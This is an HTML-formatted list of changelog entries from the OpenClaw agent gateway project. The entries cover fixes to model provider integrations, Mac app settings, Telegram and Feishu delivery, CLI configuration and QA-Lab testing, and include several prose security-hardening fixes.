<li>Providers/Xiaomi: replay MiMo Anthropic-compatible <code>reasoning_content</code> as provider-required thinking blocks even when OpenClaw thinking is disabled, fixing follow-up tool turns for <code>mimo-v2-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465996157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83407" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83407/hovercard" href="https://github.com/openclaw/openclaw/issues/83407">#83407</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xgenious7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xgenious7">@Xgenious7</a>.</li>
<li>Agents/exec approvals: forward approval-runtime credentials on agent-owned Gateway approval calls so approved async commands complete through the existing runtime path instead of stalling on unauthenticated follow-up calls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Gateway/skills: preflight remote macOS skill-bin refreshes with a WebSocket connectivity check so stale node sessions skip quickly instead of logging slow <code>system.which</code> timeout warnings.</li>
<li>CLI/config: keep broken discovered plugins that are not referenced by active config from failing <code>openclaw config validate</code>, while preserving fatal errors for explicitly configured plugin entries.</li>
<li>GitHub Copilot: drop unsafe native Responses reasoning replay items with non-replayable IDs before dispatch, preventing affected Copilot sessions from failing with <code>invalid_request_body</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464490598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83220/hovercard" href="https://github.com/openclaw/openclaw/issues/83220">#83220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Agents/Codex: fail closed when an explicitly requested Codex harness is not registered instead of silently trying configured model fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465485972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83349" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83349/hovercard" href="https://github.com/openclaw/openclaw/issues/83349">#83349</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r2-vibes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r2-vibes">@r2-vibes</a>.</li>
<li>QA-Lab: make runtime tool coverage fail on missing required tool exercise instead of treating pass/pass parity envelope drift as missing coverage.</li>
<li>Core/plugins: harden clawpatch-reported edge cases across gateway auth cleanup, Claude session id paths, plugin activation policy, apply-patch hunk handling, diagnostic redaction, and plugin metadata validation.</li>
<li>UI: show reasoning choices as plain labels instead of leaking internal override wording in session and chat pickers.</li>
<li>Mac app: avoid repeating the Configuration heading inside channel quick settings.</li>
<li>Mac app: keep the Settings sidebar always visible and remove the redundant titlebar hide/show control.</li>
<li>Mac app: normalize Settings pane content margins so pages share the same left and right rail.</li>
<li>Mac app: prefer explicit private/Tailscale/LAN Gateway endpoints over SSH tunnels, preserve legacy loopback tunnel configs, persist transport choices, and show captured SSH stderr when tunneling really fails.</li>
<li>Gateway/sessions: keep ACP/acpx and runtime child sessions visible in configured-only session lists when their owner or parent session belongs to a configured agent.</li>
<li>Mac app: keep app-level menu commands and Dashboard failure states reachable when the remote Gateway is disconnected.</li>
<li>Mac app: allow longer Gateway and Context errors to wrap in the menu instead of truncating the useful failure detail.</li>
<li>Mac app: tighten remote Gateway fields in Settings so the Connection pane keeps readable labels and full action button text.</li>
<li>Mac app: keep custom Settings card rows left-aligned and full-width so Discovery and status sections no longer appear centered or detached.</li>
<li>Mac app: align Location permission controls to the same trailing column as the rest of Settings.</li>
<li>Mac app: add Dashboard, Chat, Canvas, and Settings shortcuts to the Dock icon menu.</li>
<li>Mac app: replace the Settings window's native split-view sidebar with an explicit layout so page content keeps its leading gutter when the sidebar is shown or hidden.</li>
<li>Mac app: render channel quick config as aligned Settings rows and hide schema-only variants that cannot be edited safely from the quick pane.</li>
<li>Gateway/webchat: hide internal runtime-context and other <code>display: false</code> transcript messages from Chat history and live message events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464459552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83216/hovercard" href="https://github.com/openclaw/openclaw/issues/83216">#83216</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EmpireCreator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EmpireCreator">@EmpireCreator</a>.</li>
<li>CLI/help: keep <code>gateway</code>, <code>doctor</code>, <code>status</code>, and <code>health</code> help registration out of action/runtime imports so subcommand <code>--help</code> stays lightweight in constrained terminals. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464522965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83228/hovercard" href="https://github.com/openclaw/openclaw/issues/83228">#83228</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dfguerrerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dfguerrerom">@dfguerrerom</a>.</li>
<li>Cron/Discord: keep explicit announce runs in message-tool-only source-reply mode so scheduled agent turns post once instead of also echoing through automatic visible replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464900333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83261" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83261/hovercard" href="https://github.com/openclaw/openclaw/issues/83261">#83261</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Theralley/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Theralley">@Theralley</a>.</li>
<li>Telegram: preserve forum-topic origin targets in inbound, audio-preflight, and skipped-message hook contexts so follow-up delivery stays bound to the originating topic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465183426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83302" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83302/hovercard" href="https://github.com/openclaw/openclaw/issues/83302">#83302</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/M00zyx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/M00zyx">@M00zyx</a>.</li>
<li>Telegram: retry HTTP 421 Misdirected Request send failures on a fresh fallback transport so transient edge-node routing errors no longer drop outbound replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087256219" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48892" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48892/hovercard" href="https://github.com/openclaw/openclaw/issues/48892">#48892</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087442780" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48908" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48908/hovercard" href="https://github.com/openclaw/openclaw/pull/48908">#48908</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarsDoge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarsDoge">@MarsDoge</a>.</li>
<li>Telegram: fail topic sends closed when Telegram reports <code>message thread not found</code> instead of retrying without <code>message_thread_id</code> into the base chat. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465183426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83302" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83302/hovercard" href="https://github.com/openclaw/openclaw/issues/83302">#83302</a>.</li>
<li>Config/subagents: remove ignored agent-model <code>timeoutMs</code> keys, keep subagent model config to primary/fallback selection, and clean shipped stale config through doctor. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465090121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83291" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83291/hovercard" href="https://github.com/openclaw/openclaw/issues/83291">#83291</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Mac app: align the Sessions settings pane with the standard Settings page gutter and row spacing.</li>
<li>OpenAI/Codex: stop rejecting available <code>openai-codex</code> GPT-5.1, GPT-5.2, and GPT-5.3 model refs during config validation, while keeping removed Spark aliases suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465210488" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83303" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83303/hovercard" href="https://github.com/openclaw/openclaw/issues/83303">#83303</a>.</li>
<li>Plugins/xAI: complete OAuth-backed xAI login and sidecar auth fixes, including guarded loopback callback CORS handling, video generation polling/defaults, and native-host User-Agent attribution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465339811" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83322" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83322/hovercard" href="https://github.com/openclaw/openclaw/pull/83322">#83322</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaaneek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaaneek">@Jaaneek</a>.</li>
<li>Codex app-server: preserve streamed native command output in mirrored transcripts and trajectory exports when final snapshots omit aggregated output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464273690" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83200/hovercard" href="https://github.com/openclaw/openclaw/pull/83200">#83200</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rozmiarD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rozmiarD">@rozmiarD</a>.</li>
<li>Codex app-server: fail closed when chat or sender policy denies tools, disabling native code, app, environment, and user MCP surfaces for restricted turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457945251" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82374" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82374/hovercard" href="https://github.com/openclaw/openclaw/pull/82374">#82374</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Codex app-server: keep recent context-engine messages when oversized projected history is truncated, so short follow-ups in long channel sessions do not fall back to stale earlier turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463799694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83127" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83127/hovercard" href="https://github.com/openclaw/openclaw/pull/83127">#83127</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>Codex app-server: keep OpenClaw session spawning searchable while steering Codex-native delegation through native subagents, avoiding duplicate direct subagent surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465370887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83329" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83329/hovercard" href="https://github.com/openclaw/openclaw/pull/83329">#83329</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Codex app-server: recover stale childless Codex-native subagent task mirrors during maintenance and allow their registry rows to be cancelled without an OpenClaw child session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461986275" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82836" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82836/hovercard" href="https://github.com/openclaw/openclaw/pull/82836">#82836</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yshimadahrs-ship-it/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yshimadahrs-ship-it">@yshimadahrs-ship-it</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Feishu: return bound subagent delivery origins from session thread setup so Feishu subagent completions route back to the same DM or topic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464179397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83190" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83190/hovercard" href="https://github.com/openclaw/openclaw/pull/83190">#83190</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>.</li>
<li>CLI/update: tailor post-update Gateway recovery hints by platform, showing systemd, LaunchAgent, Scheduled Task, or generic service-manager guidance instead of macOS-only recovery text. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463495630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83096/hovercard" href="https://github.com/openclaw/openclaw/pull/83096">#83096</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Plugins: apply a default 15-second timeout to legacy <code>before_agent_start</code> hooks so hung plugin handlers no longer block agent startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085154694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48534" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48534/hovercard" href="https://github.com/openclaw/openclaw/issues/48534">#48534</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463837368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83136" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83136/hovercard" href="https://github.com/openclaw/openclaw/pull/83136">#83136</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/therahul-yo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/therahul-yo">@therahul-yo</a>.</li>
<li>Feishu: refresh inbound session delivery context for DM, group, and broadcast turns so later replies do not inherit stale WebChat routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4388788955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78274" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/78274/hovercard" href="https://github.com/openclaw/openclaw/issues/78274">#78274</a>.</li>
<li>Agents/subagents: require the initial subagent registry save before reporting spawn accepted, returning a spawn error instead of losing an untracked run when the registry write fails. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463909257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83146/hovercard" href="https://github.com/openclaw/openclaw/pull/83146">#83146</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>QA-Lab/qa-channel: attach redacted agent tool-start traces to outbound <code>QaBusMessage</code> records so scenarios can assert actual tool use instead of relying only on reply text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275248060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67637/hovercard" href="https://github.com/openclaw/openclaw/issues/67637">#67637</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: fail live runtime parity reports when assistant-message usage is missing, preventing <code>0 vs 0</code> live token rows from being reported as passing proof. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416721771" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80411/hovercard" href="https://github.com/openclaw/openclaw/issues/80411">#80411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a runtime token-efficiency sidecar report that classifies Codex savings separately from regressions and fails only positive Codex-over-Pi live token deltas above threshold. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4430998561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81093" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81093/hovercard" href="https://github.com/openclaw/openclaw/issues/81093">#81093</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: fail Codex-backed OpenAI live runtime-pair runs before launching isolated workers when no portable Codex auth is available, while staging API-key fallbacks and configured Codex keys for isolated QA agents. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416721774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80412" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80412/hovercard" href="https://github.com/openclaw/openclaw/issues/80412">#80412</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: refresh parity gates, mock frontier fixtures, model scenarios, and workflow artifact lanes to compare GPT-5.5 against Claude Opus 4.7. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349437446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74262" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74262/hovercard" href="https://github.com/openclaw/openclaw/issues/74262">#74262</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: make mock parity dispatch provider-aware for source discovery and subagent scenarios so OpenAI and Anthropic lanes no longer share identical canned plans. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245036106" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64879/hovercard" href="https://github.com/openclaw/openclaw/issues/64879">#64879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: stop returning Control UI bearer tokens from unauthenticated bootstrap payloads and bind Docker harness ports to loopback-only host addresses. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259596226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66355" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66355/hovercard" href="https://github.com/openclaw/openclaw/pull/66355">#66355</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Mac app: avoid a SwiftUI metadata crash when rendering the Cron Jobs settings pane.</li>
<li>Agents/subagents: preserve run-mode keep subagent registry entries past the session sweep TTL, so kept subagent runs remain visible after cleanup completes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463823834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83132" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83132/hovercard" href="https://github.com/openclaw/openclaw/issues/83132">#83132</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464018781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83168" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83168/hovercard" href="https://github.com/openclaw/openclaw/pull/83168">#83168</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>.</li>
<li>Agents/OpenAI streams: yield via <code>setTimeout(0)</code> instead of <code>setImmediate</code> between bursty Responses chunks so abort timers can fire during the yield, keeping cancel-on-timeout responsive on hot streams. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4458742937" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82462" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82462/hovercard" href="https://github.com/openclaw/openclaw/issues/82462">#82462</a>.</li>
<li>Agents/Codex: keep legacy <code>oauthRef</code>-backed OAuth profiles usable while <code>openclaw doctor --fix</code> migrates them back to inline credentials, without creating new sidecar credentials. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465275872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83312" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83312/hovercard" href="https://github.com/openclaw/openclaw/pull/83312">#83312</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/Codex: load the selected provider owner alongside the Codex harness runtime so <code>openai-codex</code> models resolve when plugin allowlists scope runtime loading. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465725039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83380" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83380/hovercard" href="https://github.com/openclaw/openclaw/issues/83380">#83380</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467452244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83519" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83519/hovercard" href="https://github.com/openclaw/openclaw/pull/83519">#83519</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram: fail stalled isolated-ingress handlers into tombstones and abort same-lane reply work before restarting, so later same-chat updates drain after a hung turn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464995305" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83272" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83272/hovercard" href="https://github.com/openclaw/openclaw/issues/83272">#83272</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467244502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83505/hovercard" href="https://github.com/openclaw/openclaw/pull/83505">#83505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>CLI/config: send SecretRef diagnostics to stderr so JSON command stdout remains parseable.</li>
<li>CLI/doctor: seed Control UI allowed origins when migrating legacy non-loopback gateway bind host aliases like <code>0.0.0.0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465089879" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83286" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83286/hovercard" href="https://github.com/openclaw/openclaw/issues/83286">#83286</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>CLI/plugins: ship the bundled memory CLI as a package entry so package-installed <code>openclaw memory</code> commands register correctly.</li>
<li>CLI/update: defer doctor-time plugin package installs during package swaps and seed post-core repair from the updated install registry, preventing duplicate reinstall failures.</li>
<li>CLI/update: preserve old-parent-readable config metadata during legacy package handoffs, fall back only to official <code>@openclaw/*</code> npm plugin packages when ClawHub plugin artifacts are unavailable, and keep managed service package roots authoritative during updates.</li>
<li>Feishu: detect SecretRef top-level credentials as a configured default account instead of treating object-backed app secrets as missing.</li>
<li>Gateway/restart: keep ordinary unmanaged SIGUSR1/config restarts in-process instead of detach-spawning an orphaned child, preserving custom supervisor PID tracking while leaving update restarts on the fresh-process path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250873603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65668" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65668/hovercard" href="https://github.com/openclaw/openclaw/issues/65668">#65668</a>.</li>
<li>CLI/completion: resolve concrete PowerShell profile paths and reload commands during setup and doctor completion installation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066360712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44296/hovercard" href="https://github.com/openclaw/openclaw/issues/44296">#44296</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463206646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83059/hovercard" href="https://github.com/openclaw/openclaw/pull/83059">#83059</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yu-xin-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yu-xin-c">@yu-xin-c</a>.</li>
<li>Telegram: keep isolated long polling below the hard <code>getUpdates</code> request guard so idle bot accounts with high <code>timeoutSeconds</code> do not false-disconnect and restart-loop. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464939101" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83264/hovercard" href="https://github.com/openclaw/openclaw/issues/83264">#83264</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/riccodecarvalho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/riccodecarvalho">@riccodecarvalho</a>.</li>
